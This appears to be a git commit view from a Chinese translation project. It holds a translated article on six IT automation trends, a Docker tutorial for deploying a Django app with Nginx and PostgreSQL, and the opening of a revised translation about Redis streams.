![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/cio_ai_artificial_intelligence.png?itok=o0csm9l2)

我们最近介绍了[促进自动化的因素][1]、目前正在被人们采用的[趋势][2],以及那些刚开始对部分流程实施自动化的组织的[有用技巧][3]。

哦,我们也分享了[如何在你的公司阐明自动化的用例][4],以及[长期成功的关键][5]。

现在,只剩下一个问题:自动化的下一步是什么?我们邀请了一系列专家分享一下[自动化][6]不远的将来。以下是他们建议 IT 领导者密切关注的六大趋势。

### 1. 机器学习的成熟

对于关于[机器学习][7](或类似的“自我学习系统”)的讨论,就绝大多数组织的实际落地而言,仍然为时过早。但预计这将发生变化,机器学习将在下一次 IT 自动化浪潮中扮演至关重要的角色。

[Advanced Systems Concepts, Inc.][8] 公司工程总监 Mehul Amin 指出,机器学习是 IT 自动化下一个关键增长领域之一。

“随着数据量的增长,自动化软件理应可以自我决策,否则这就是开发人员的责任了,”Amin 说。“例如,开发者决定构建什么,但识别最佳执行流程的,可能是系统内的软件分析。”

把这个思路延伸到其他地方。Amin 指出,机器学习可以使自动化系统在必要的时候提供额外的资源,以满足时间线或 SLA 的需要,同样在不需要资源的时候释放它们,以及其他的可能性。

显然不只有 Amin 一个人这样认为。

[Sungard Availability Services][9] 公司首席架构师 Kiran Chitturi 表示,“IT 自动化正在走向自我学习的方向。系统将能够测试和监控自己,增强业务流程和软件交付能力。”

Chitturi 指出自动化测试就是个例子。脚本测试已经被广泛采用,但很快这些自动化测试流程将会更善于学习、更快发展,例如随着新代码的开发或其对生产环境的影响范围扩大而进行调整。

### 2. 人工智能催生的自动化

上述原则同样适用于[人工智能][10]这个相关(但独立)的领域。可以预期,新兴的人工智能技术也将产生新的自动化机会。相对于更宽泛定义的人工智能,机器学习在短期内可能对 IT 领域产生更大的影响(而且我们可能会看到这两个术语的定义和理解存在许多重叠)。

[SolarWinds][11] 公司技术负责人 Patrick Hubbard 说,“人工智能(AI)和机器学习的整合普遍被认为对未来几年的商业成功起着至关重要的作用。”

### 3. 这并不意味着不再需要人力

让我们试着安慰一下那些不知所措的人:前两种趋势并不一定意味着我们将失去工作。

这很可能意味着各种角色的改变,以及[全新角色][12]的创造。

但是至少在可预见的将来,你不必向机器人鞠躬。

“一台机器只能运行在给定的环境变量中,它不能选择引入新的变量,在今天只有人类可以这样做,”Hubbard 解释说。“但是,对于 IT 专业人员来说,这将是一个需要培养 AI 和自动化技能的时代,例如对程序设计、编程、管理人工智能和机器学习功能算法的基本理解,以及用强大的安全态势面对更复杂的网络攻击。”

Hubbard 分享了一些新的工具或功能的例子,例如支持人工智能的安全软件,或者可以远程发现石油管道维护需求的机器学习应用程序。两者都可以提高效率和效果,但都不会取代所需的信息安全或管道维护人员。

“许多新功能仍需要人工监控,”Hubbard 说。“例如,为了让机器确定一些‘预测’是否可能成为‘规律’,人为的管理是必要的。”

即使你把机器学习和 AI 放在一边,只看一般的 IT 自动化,同样的原理也是成立的,尤其是在软件开发生命周期中。

[Juniper Networks][13] 公司自动化首席架构师 Matthew Oswalt 指出,IT 自动化增长的根本原因是它通过减少操作基础设施所需的人工工作量来创造直接价值。

> 操作工程师可以使用事件驱动的自动化,以代码的形式提前定义他们的工作流程,而不是在凌晨 3 点来应对基础设施的问题。

“它也将操作工作流程表示为代码,而不再是容易过时的文档或部落知识,”Oswalt 解释说。“操作人员仍然需要在[自动化]工具响应事件方面发挥积极作用。采用自动化的下一个阶段是建立一个能够跨整个 IT 领域识别所发生的有趣事件、并以自主方式进行响应的系统。操作工程师可以使用事件驱动的自动化,以代码的形式提前定义他们的工作流程,而不是在凌晨 3 点来应对基础设施的问题。他们可以依靠这个系统在任何时候以同样的方式作出回应。”

### 4. 对自动化的焦虑将会减少

SolarWinds 公司的 Hubbard 指出,“自动化”一词本身就会产生大量的不确定性和担忧,不仅仅是在 IT 领域,而且是跨专业领域的,他说这种担忧是合理的。但一些随之而来的担忧可能被夸大了,甚至被科技产业本身夸大了。现实可能实际上是这方面的镇静剂:当自动化的实际实施和实践帮助人们认识到本列表中的第 3 项时,我们将看到第 4 项的出现。

“今年我们可能会看到对自动化焦虑的减少,更多的组织开始接受人工智能和机器学习作为增强现有人力资源的一种方式,”Hubbard 说。“自动化历史上为更多的工作创造了空间,它通过降低完成较小任务的成本和时间,将劳动力重新集中到无法自动化并需要人力的事情上。人工智能和机器学习也是如此。”

自动化还将减少让 IT 领导者神经紧张的一大主题的焦虑:安全。正如[红帽][14]公司首席架构师 Matt Smith 最近[指出][15]的那样,自动化将越来越多地帮助 IT 部门降低与维护任务相关的安全风险。

他的建议是:“首先记录并自动化维护活动期间 IT 资产之间的交互。通过依靠自动化,您不仅可以消除历史上需要大量手动操作和手术般技巧的任务,还可以降低人为错误的风险,并展示当您的 IT 组织采纳变更和新的工作方法时可能发生的情况。最终,这将迅速减少对应用安全补丁的抵制。而且它还可以帮助您的企业在下一次重大安全事件中避免上头条新闻。”

**[ 阅读全文:[12 个要打破的企业安全坏习惯][16] ]**

### 5. 脚本和自动化工具将持续发展

许多组织将增加自动化的第一步——通常以脚本或自动化工具(有时称为配置管理工具)的形式——视为“早期”工作。

但是随着各种自动化技术的使用,对这些工具的看法也在不断发展。

[DataVision][18] 首席运营官 Mark Abolafia 表示:“数据中心环境中存在很多重复性过程,容易出现人为错误,[Ansible][17] 等技术有助于缓解这些问题。通过 Ansible,人们可以为一组操作编写特定的步骤,并输入不同的变量,例如地址等,使过去需要人工干预和更长交付时间的长过程链实现自动化。”

**[ 想了解更多关于 Ansible 的知识吗?阅读相关文章:[使用 Ansible 时的成功秘诀][19] ]**
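
Abolafia 描述的“为一组操作编写特定的步骤,并输入不同的变量”的模式,可以用一个极简的 Ansible 剧本来示意。以下只是一个假设性的示意草图,其中的主机组名、变量名和模板文件都是示例,并非文中提到的任何真实环境:

```
# site.yml —— 示意性的 Ansible 剧本:
# 同一组步骤对整组主机复用,只需改变变量(如地址)即可
- hosts: datacenter          # 假设的清单组名
  become: yes
  vars:
    ntp_server: 10.0.0.1     # 示例变量,可按环境覆盖
  tasks:
    - name: 安装 ntp 包
      package:
        name: ntp
        state: present
    - name: 下发 ntp 配置(模板中引用 ntp_server 变量)
      template:
        src: ntp.conf.j2
        dest: /etc/ntp.conf
      notify: restart ntp
  handlers:
    - name: restart ntp
      service:
        name: ntp
        state: restarted
```

同样的剧本跑在十台或一千台机器上的步骤完全一致,这正是它减少人为错误的原因。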
另一个因素是:工具本身将继续变得更先进。

“使用先进的 IT 自动化工具,开发人员将能够在更短的时间内构建和自动化工作流程,减少易出错的编码,”ASCI 公司的 Amin 说。“这些工具包括预先构建的、经过预先测试的拖放式集成、API 作业、丰富的变量使用、引用功能和对象修订历史记录。”

### 6. 自动化开创了新的指标机会

正如我们在此前所说的那样,IT 自动化不是万能的。它不会修复被破坏的流程,或者以其他方式为您的组织提供全面的灵丹妙药。这一点也是双向的:自动化并不能消除衡量性能的必要性。

**[ 参见我们的相关文章:[DevOps 指标:你在衡量真正重要的东西吗?][20] ]**

实际上,自动化应该打开新的机会。

[Janeiro Digital][21] 公司架构副总裁 Josh Collins 说,“随着越来越多的开发活动——源代码管理、DevOps 管道、工作项目跟踪——转向 API 驱动的平台,将这些原始数据拼接在一起以描绘组织效率图景的机会越来越大”。

Collins 认为这是一种可能的新型“开发组织度量指标”。但不要误认为这意味着机器和算法可以突然评判 IT 所做的一切。

“无论是衡量单个资源还是整体团队,这些指标都可能很强大——但应该结合大量的背景来解读,”Collins 说,“将这些数据用于观察高层次趋势并印证定性观察——而不是对你的团队进行临床式的评级。”

**想要获取更多这样的知识吗,IT 领导者?[注册我们的每周电子邮件通讯][22]。**

--------------------------------------------------------------------------------

via: https://enterprisersproject.com/article/2018/3/what-s-next-it-automation-6-trends-watch

作者:[Kevin Casey][a]
译者:[MZqk](https://github.com/MZqk)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://enterprisersproject.com/user/kevin-casey
[1]:https://enterprisersproject.com/article/2017/12/5-factors-fueling-automation-it-now
[2]:https://enterprisersproject.com/article/2017/12/4-trends-watch-it-automation-expands
[3]:https://enterprisersproject.com/article/2018/1/getting-started-automation-6-tips
[4]:https://enterprisersproject.com/article/2018/1/how-make-case-it-automation
[5]:https://enterprisersproject.com/article/2018/1/it-automation-best-practices-7-keys-long-term-success
[6]:https://enterprisersproject.com/tags/automation
[7]:https://enterprisersproject.com/article/2018/2/how-spot-machine-learning-opportunity
[8]:https://www.advsyscon.com/en-us/
[9]:https://www.sungardas.com/en/
[10]:https://enterprisersproject.com/tags/artificial-intelligence
[11]:https://www.solarwinds.com/
[12]:https://enterprisersproject.com/article/2017/12/8-emerging-ai-jobs-it-pros
[13]:https://www.juniper.net/
[14]:https://www.redhat.com/en?intcmp=701f2000000tjyaAAA
[15]:https://enterprisersproject.com/article/2018/2/12-bad-enterprise-security-habits-break
[16]:https://enterprisersproject.com/article/2018/2/12-bad-enterprise-security-habits-break?sc_cid=70160000000h0aXAAQ
[17]:https://opensource.com/tags/ansible
[18]:https://datavision.com/
[19]:https://opensource.com/article/18/2/tips-success-when-getting-started-ansible?intcmp=701f2000000tjyaAAA
[20]:https://enterprisersproject.com/article/2017/7/devops-metrics-are-you-measuring-what-matters?sc_cid=70160000000h0aXAAQ
[21]:https://www.janeirodigital.com/
[22]:https://enterprisersproject.com/email-newsletter?intcmp=701f2000000tsjPAAQ
@ -0,0 +1,415 @@
|
|||||||
|
Docker 指南:Docker 化 Python Django 应用程序
|
||||||
|
======
|
||||||
|
|
||||||
|
### 目录

1. [我们要做什么?][6]
2. [步骤 1 - 安装 Docker-ce][7]
3. [步骤 2 - 安装 Docker-compose][8]
4. [步骤 3 - 配置项目环境][9]
   1. [创建一个新的 requirements.txt 文件][1]
   2. [创建 Nginx 虚拟主机文件 django.conf][2]
   3. [创建 Dockerfile][3]
   4. [创建 Docker-compose 脚本][4]
   5. [配置 Django 项目][5]
5. [步骤 4 - 构建并运行 Docker 镜像][10]
6. [步骤 5 - 测试][11]
7. [参考][12]
Docker 是一个开源项目,为开发人员和系统管理员提供了一个开放平台,作为一个轻量级容器,它可以在任何地方构建,打包和运行应用程序。Docker 在软件容器中自动部署应用程序。
|
||||||
|
|
||||||
|
Django 是一个用 Python 编写的 Web 应用程序框架,遵循 MVC(模型-视图-控制器)架构。它是免费的,并在开源许可下发布。它速度很快,旨在帮助开发人员尽快将他们的应用程序上线。
|
||||||
|
|
||||||
|
在本教程中,我将逐步向你展示在 Ubuntu 16.04 如何为现有的 Django 应用程序创建 docker 镜像。我们将学习如何 docker 化一个 Python Django 应用程序,然后使用一个 docker-compose 脚本将应用程序作为容器部署到 docker 环境。
|
||||||
|
|
||||||
|
为了部署我们的 Python Django 应用程序,我们需要其他 docker 镜像:一个用于 Web 服务器的 nginx docker 镜像和用于数据库的 PostgreSQL 镜像。
|
||||||
|
|
||||||
|
### 我们要做什么?
|
||||||
|
|
||||||
|
1. 安装 Docker-ce
|
||||||
|
|
||||||
|
2. 安装 Docker-compose
|
||||||
|
|
||||||
|
3. 配置项目环境
|
||||||
|
|
||||||
|
4. 构建并运行
|
||||||
|
|
||||||
|
5. 测试
|
||||||
|
|
||||||
|
### 步骤 1 - 安装 Docker-ce
|
||||||
|
|
||||||
|
在本教程中,我们将从 Docker 仓库安装 docker-ce 社区版,并且安装支持 compose 文件版本 3 的 docker-compose。
|
||||||
|
|
||||||
|
在安装 docker-ce 之前,先使用 apt 命令安装所需的 docker 依赖项。
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt install -y \
|
||||||
|
apt-transport-https \
|
||||||
|
ca-certificates \
|
||||||
|
curl \
|
||||||
|
software-properties-common
|
||||||
|
```
|
||||||
|
|
||||||
|
现在通过运行以下命令添加 docker 密钥和仓库。
|
||||||
|
|
||||||
|
```
|
||||||
|
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
|
||||||
|
sudo add-apt-repository \
|
||||||
|
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
|
||||||
|
$(lsb_release -cs) \
|
||||||
|
stable"
|
||||||
|
```
|
||||||
|
|
||||||
|
[![安装 Docker-ce](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/1.png)][14]
|
||||||
|
|
||||||
|
更新仓库并安装 docker-ce。
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt update
|
||||||
|
sudo apt install -y docker-ce
|
||||||
|
```
|
||||||
|
|
||||||
|
安装完成后,启动 docker 服务并使其能够在每次系统引导时启动。
|
||||||
|
|
||||||
|
```
|
||||||
|
systemctl start docker
|
||||||
|
systemctl enable docker
|
||||||
|
```
|
||||||
|
|
||||||
|
接着,我们将添加一个名为 'omar' 的新用户并将其添加到 docker 组。
|
||||||
|
|
||||||
|
```
|
||||||
|
useradd -m -s /bin/bash omar
|
||||||
|
usermod -a -G docker omar
|
||||||
|
```
|
||||||
|
|
||||||
|
[![启动 Docker](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/2.png)][15]
|
||||||
|
|
||||||
|
以 omar 用户身份登录并运行 docker 命令,如下所示。
|
||||||
|
|
||||||
|
```
|
||||||
|
su - omar
|
||||||
|
docker run hello-world
|
||||||
|
```
|
||||||
|
|
||||||
|
确保你能从 Docker 获得 hello-world 消息。
|
||||||
|
|
||||||
|
[![检查 Docker 安装](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/3.png)][16]
|
||||||
|
|
||||||
|
Docker-ce 安装已经完成。
|
||||||
|
|
||||||
|
### 步骤 2 - 安装 Docker-compose
|
||||||
|
|
||||||
|
在本教程中,我们将使用支持 compose 文件版本 3 的最新版 docker-compose,并采用手动方式安装它。
|
||||||
|
|
||||||
|
使用 curl 命令将最新版本的 docker-compose 下载到 `/usr/local/bin` 目录,并使用 chmod 命令使其有执行权限。
|
||||||
|
|
||||||
|
运行以下命令:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo curl -L https://github.com/docker/compose/releases/download/1.21.0/docker-compose-$(uname -s)-$(uname -m) -o /usr/local/bin/docker-compose
|
||||||
|
sudo chmod +x /usr/local/bin/docker-compose
|
||||||
|
```
|
||||||
|
|
||||||
|
现在检查 docker-compose 版本。
|
||||||
|
|
||||||
|
```
|
||||||
|
docker-compose version
|
||||||
|
```
|
||||||
|
|
||||||
|
确保你安装的是最新版本的 docker-compose 1.21。
|
||||||
|
|
||||||
|
[![安装 Docker-compose](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/4.png)][17]
|
||||||
|
|
||||||
|
已安装支持 compose 文件版本 3 的 docker-compose 最新版本。
|
||||||
|
|
||||||
|
### 步骤 3 - 配置项目环境
|
||||||
|
|
||||||
|
在这一步中,我们将配置 Python Django 项目环境。我们将创建新目录 'guide01',并使其成为我们项目文件的主目录,例如 Dockerfile,Django 项目,nginx 配置文件等。
|
||||||
|
|
||||||
|
登录到 'omar' 用户。
|
||||||
|
|
||||||
|
```
|
||||||
|
su - omar
|
||||||
|
```
|
||||||
|
|
||||||
|
创建一个新目录 'guide01',并进入目录。
|
||||||
|
|
||||||
|
```
|
||||||
|
mkdir -p guide01
|
||||||
|
cd guide01/
|
||||||
|
```
|
||||||
|
|
||||||
|
现在在 'guide01' 目录下,创建两个新目录 'project' 和 'config'。
|
||||||
|
|
||||||
|
```
|
||||||
|
mkdir project/ config/
|
||||||
|
```
|
||||||
|
|
||||||
|
注意:
|
||||||
|
|
||||||
|
* 'project' 目录:我们所有的 python Django 项目文件都将放在该目录中。
|
||||||
|
|
||||||
|
* 'config' 目录:项目配置文件的目录,包括 nginx 配置文件,python pip requirements 文件等。
|
||||||
|
|
||||||
|
### 创建一个新的 requirements.txt 文件
|
||||||
|
|
||||||
|
接下来,使用 vim 命令在 'config' 目录中创建一个新的 requirements.txt 文件
|
||||||
|
|
||||||
|
```
|
||||||
|
vim config/requirements.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
粘贴下面的配置。
|
||||||
|
|
||||||
|
```
|
||||||
|
Django==2.0.4
|
||||||
|
gunicorn==19.7.0
|
||||||
|
psycopg2==2.7.4
|
||||||
|
```
|
||||||
|
|
||||||
|
保存并退出。
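
### 创建 Nginx 虚拟主机文件 django.conf

docker-compose 脚本会把 `./config/nginx` 目录挂载为 Nginx 的 `conf.d`,因此还需要在其中放一个虚拟主机文件。下面是一个示意性的配置草图(其中 upstream 名称 `web` 对应 docker-compose 中的 web 服务,端口与脚本中暴露的 8000 端口一致;具体细节属于示例假设):

```
mkdir -p config/nginx/
vim config/nginx/django.conf
```

粘贴以下配置:

```
# 示例配置:将请求反向代理到 docker-compose 中名为 'web' 的 Django/gunicorn 服务
upstream web {
  ip_hash;
  server web:8000;
}

server {
  listen 8000;
  server_name localhost;

  # 静态文件直接由 Nginx 提供(与容器内 /src/static 挂载对应)
  location /static/ {
    autoindex on;
    alias /src/static/;
  }

  location / {
    proxy_pass http://web/;
  }
}
```

保存并退出。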
|
||||||
|
|
||||||
|
### 创建 Dockerfile
|
||||||
|
|
||||||
|
在 'guide01' 目录下创建新文件 'Dockerfile'。
|
||||||
|
|
||||||
|
运行以下命令。
|
||||||
|
|
||||||
|
```
|
||||||
|
vim Dockerfile
|
||||||
|
```
|
||||||
|
|
||||||
|
现在粘贴下面的 Dockerfile 脚本。
|
||||||
|
|
||||||
|
```
|
||||||
|
FROM python:3.5-alpine
|
||||||
|
ENV PYTHONUNBUFFERED 1
|
||||||
|
|
||||||
|
RUN apk update && \
|
||||||
|
apk add --virtual build-deps gcc python-dev musl-dev && \
|
||||||
|
apk add postgresql-dev bash
|
||||||
|
|
||||||
|
RUN mkdir /config
|
||||||
|
ADD /config/requirements.txt /config/
|
||||||
|
RUN pip install -r /config/requirements.txt
|
||||||
|
RUN mkdir /src
|
||||||
|
WORKDIR /src
|
||||||
|
```
|
||||||
|
|
||||||
|
保存并退出。
|
||||||
|
|
||||||
|
注意:
|
||||||
|
|
||||||
|
我们想要为我们的 Django 项目构建基于 Alpine Linux 的 Docker 镜像,Alpine 是最小的 Linux 版本。我们的 Django 项目将运行在带有 Python3.5 的 Alpine Linux 上,并添加 postgresql-dev 包以支持 PostgreSQL 数据库。然后,我们将使用 python pip 命令安装在 'requirements.txt' 上列出的所有 Python 包,并为我们的项目创建新目录 '/src'。
|
||||||
|
|
||||||
|
### 创建 Docker-compose 脚本
|
||||||
|
|
||||||
|
使用 [vim][18] 命令在 'guide01' 目录下创建 'docker-compose.yml' 文件。
|
||||||
|
|
||||||
|
```
|
||||||
|
vim docker-compose.yml
|
||||||
|
```
|
||||||
|
|
||||||
|
粘贴以下配置内容。
|
||||||
|
|
||||||
|
```
|
||||||
|
version: '3'
|
||||||
|
services:
|
||||||
|
db:
|
||||||
|
image: postgres:10.3-alpine
|
||||||
|
container_name: postgres01
|
||||||
|
nginx:
|
||||||
|
image: nginx:1.13-alpine
|
||||||
|
container_name: nginx01
|
||||||
|
ports:
|
||||||
|
- "8000:8000"
|
||||||
|
volumes:
|
||||||
|
- ./project:/src
|
||||||
|
- ./config/nginx:/etc/nginx/conf.d
|
||||||
|
depends_on:
|
||||||
|
- web
|
||||||
|
web:
|
||||||
|
build: .
|
||||||
|
container_name: django01
|
||||||
|
command: bash -c "python manage.py makemigrations && python manage.py migrate && python manage.py collectstatic --noinput && gunicorn hello_django.wsgi -b 0.0.0.0:8000"
|
||||||
|
depends_on:
|
||||||
|
- db
|
||||||
|
volumes:
|
||||||
|
- ./project:/src
|
||||||
|
expose:
|
||||||
|
- "8000"
|
||||||
|
restart: always
|
||||||
|
```
|
||||||
|
|
||||||
|
保存并退出。
|
||||||
|
|
||||||
|
注意:
|
||||||
|
|
||||||
|
使用这个 docker-compose 文件脚本,我们将创建三个服务。使用 PostgreSQL alpine Linux 创建名为 'db' 的数据库服务,再次使用 Nginx alpine Linux 创建 'nginx' 服务,并使用从 Dockerfile 生成的自定义 docker 镜像创建我们的 python Django 容器。
|
||||||
|
|
||||||
|
[![配置项目环境](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/5.png)][19]
|
||||||
|
|
||||||
|
### 配置 Django 项目
|
||||||
|
|
||||||
|
将 Django 项目文件复制到 'project' 目录。
|
||||||
|
|
||||||
|
```
|
||||||
|
cd ~/django
|
||||||
|
cp -r * ~/guide01/project/
|
||||||
|
```
|
||||||
|
|
||||||
|
进入 'project' 目录并编辑应用程序设置 'settings.py'。
|
||||||
|
|
||||||
|
```
|
||||||
|
cd ~/guide01/project/
|
||||||
|
vim hello_django/settings.py
|
||||||
|
```
|
||||||
|
|
||||||
|
注意:
|
||||||
|
|
||||||
|
我们将部署名为 'hello_django' 的简单 Django 应用程序。
|
||||||
|
|
||||||
|
在 'ALLOWED_HOSTS' 行中,添加服务名称 'web'。
|
||||||
|
|
||||||
|
```
|
||||||
|
ALLOWED_HOSTS = ['web']
|
||||||
|
```
|
||||||
|
|
||||||
|
现在更改数据库设置,我们将使用 PostgreSQL 数据库,'db' 数据库作为服务运行,使用默认用户和密码。
|
||||||
|
|
||||||
|
```
|
||||||
|
DATABASES = {
|
||||||
|
'default': {
|
||||||
|
'ENGINE': 'django.db.backends.postgresql_psycopg2',
|
||||||
|
'NAME': 'postgres',
|
||||||
|
'USER': 'postgres',
|
||||||
|
'HOST': 'db',
|
||||||
|
'PORT': 5432,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
至于 'STATIC_ROOT' 配置目录,将此行添加到文件行的末尾。
|
||||||
|
|
||||||
|
```
|
||||||
|
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
|
||||||
|
```
|
||||||
|
|
||||||
|
保存并退出。
|
||||||
|
|
||||||
|
[![配置 Django 项目](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/6.png)][20]
|
||||||
|
|
||||||
|
现在我们准备在 docker 容器下构建和运行 Django 项目。
|
||||||
|
|
||||||
|
### 步骤 4 - 构建并运行 Docker 镜像
|
||||||
|
|
||||||
|
在这一步中,我们想要使用 'guide01' 目录中的配置为我们的 Django 项目构建一个 Docker 镜像。
|
||||||
|
|
||||||
|
进入 'guide01' 目录。
|
||||||
|
|
||||||
|
```
|
||||||
|
cd ~/guide01/
|
||||||
|
```
|
||||||
|
|
||||||
|
现在使用 docker-compose 命令构建 docker 镜像。
|
||||||
|
|
||||||
|
```
|
||||||
|
docker-compose build
|
||||||
|
```
|
||||||
|
|
||||||
|
[![运行 docker 镜像](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/7.png)][21]
|
||||||
|
|
||||||
|
启动 docker-compose 脚本中的所有服务。
|
||||||
|
|
||||||
|
```
|
||||||
|
docker-compose up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
等待几分钟让 Docker 构建我们的 Python 镜像并下载 nginx 和 postgresql docker 镜像。
|
||||||
|
|
||||||
|
[![使用 docker-compose 构建镜像](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/8.png)][22]
|
||||||
|
|
||||||
|
完成后,使用以下命令检查运行容器并在系统上列出 docker 镜像。
|
||||||
|
|
||||||
|
```
|
||||||
|
docker-compose ps
|
||||||
|
docker-compose images
|
||||||
|
```
|
||||||
|
|
||||||
|
现在,你将在系统上运行三个容器并列出 Docker 镜像,如下所示。
|
||||||
|
|
||||||
|
[![docke-compose ps 命令](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/9.png)][23]
|
||||||
|
|
||||||
|
我们的 Python Django 应用程序现在在 docker 容器内运行,并且已经创建了为我们服务的 docker 镜像。
|
||||||
|
|
||||||
|
### 步骤 5 - 测试
|
||||||
|
|
||||||
|
打开 Web 浏览器并使用端口 8000 键入服务器地址,我的是:http://ovh01:8000/
|
||||||
|
|
||||||
|
现在你将获得默认的 Django 主页。
|
||||||
|
|
||||||
|
[![默认 Django 项目主页](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/10.png)][24]
|
||||||
|
|
||||||
|
接下来,通过在 URL 上添加 “/admin” 路径来测试管理页面。
|
||||||
|
|
||||||
|
http://ovh01:8000/admin/
|
||||||
|
|
||||||
|
然后你将会看到 Django admin 登录页面。
|
||||||
|
|
||||||
|
[![Django administration](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/11.png)][25]
|
||||||
|
|
||||||
|
Docker 化 Python Django 应用程序已成功完成。
|
||||||
|
|
||||||
|
### 参考
|
||||||
|
|
||||||
|
* [https://docs.docker.com/][13]
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/
|
||||||
|
|
||||||
|
作者:[Muhammad Arul][a]
|
||||||
|
译者:[MjSeven](https://github.com/MjSeven)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/
|
||||||
|
[1]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#create-a-new-requirementstxt-file
|
||||||
|
[2]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#create-the-nginx-virtual-host-file-djangoconf
|
||||||
|
[3]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#create-the-dockerfile
|
||||||
|
[4]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#create-dockercompose-script
|
||||||
|
[5]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#configure-django-project
|
||||||
|
[6]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#what-we-will-do
|
||||||
|
[7]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-install-dockerce
|
||||||
|
[8]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-install-dockercompose
|
||||||
|
[9]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-configure-project-environment
|
||||||
|
[10]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-build-and-run-the-docker-image
|
||||||
|
[11]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-testing
|
||||||
|
[12]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#reference
|
||||||
|
[13]:https://docs.docker.com/
|
||||||
|
[14]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/1.png
|
||||||
|
[15]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/2.png
|
||||||
|
[16]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/3.png
|
||||||
|
[17]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/4.png
|
||||||
|
[18]:https://www.howtoforge.com/vim-basics
|
||||||
|
[19]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/5.png
|
||||||
|
[20]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/6.png
|
||||||
|
[21]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/7.png
|
||||||
|
[22]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/8.png
|
||||||
|
[23]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/9.png
|
||||||
|
[24]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/10.png
|
||||||
|
[25]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/11.png
|
@ -1,184 +1,183 @@
|
|||||||
streams:一个新的 Redis 通用数据结构
|
Streams:一个新的 Redis 通用数据结构
|
||||||
==================================
|
======
|
||||||
|
|
||||||
直到几个月以前,对于我来说,在消息传递的环境中,streams 只是一个有趣且相对简单的概念。在 Kafka 流行这个概念之后,我主要研究它们在 Disque 实例中的用途。Disque 是一个将会转变为 Redis 4.2 模块的消息队列。后来我发现 Disque 全都是 AP 消息,它将在不需要客户端过多参与的情况下实现容错和保证送达,因此,我认为 streams 的概念在那种情况下并不适用。
|
|
||||||
|
|
||||||
然而同时,在 Redis 中有一个问题,那就是缺省情况下导出数据结构并不轻松。它在 Redis 列表、排序集和发布/订阅(Pub/Sub)能力之间有某些缺陷。你可以权衡使用这些工具去模拟一个消息或事件的序列。
|
|
||||||
|
|
||||||
排序集是大量耗费内存的,不能自然的模拟一次又一次的相同消息的传递,客户端不能阻塞新消息。因为一个排序集并不是一个序列化的数据结构,它是一个元素可以根据它们量的变化而移动的集合:它不是很像时间系列一样的东西。
|
直到几个月以前,对于我来说,在消息传递的环境中,<ruby>流<rt>streams</rt></ruby>只是一个有趣且相对简单的概念。这个概念在 Kafka 流行之后,我主要研究它们在 Disque 案例中的应用,Disque 是一个消息队列,它将在 Redis 4.2 中被转换为 Redis 的一个模块。后来我决定让 Disque 都用 AP 消息[1],也就是说,它将在不需要客户端过多参与的情况下实现容错和可用性,这样一来,我更加确定地认为流的概念在那种情况下并不适用。
|
||||||
|
|
||||||
列表有另外的问题,它在某些特定的用例中产生类似的适用性问题:你无法浏览列表中部是什么,因为在那种情况下,访问时间是线性的。此外,没有任何的指定输出功能,列表上的阻塞操作仅为单个客户端提供单个元素。列表中没有固定的元素标识,也就是说,不能指定从哪个元素开始给我提供内容。
|
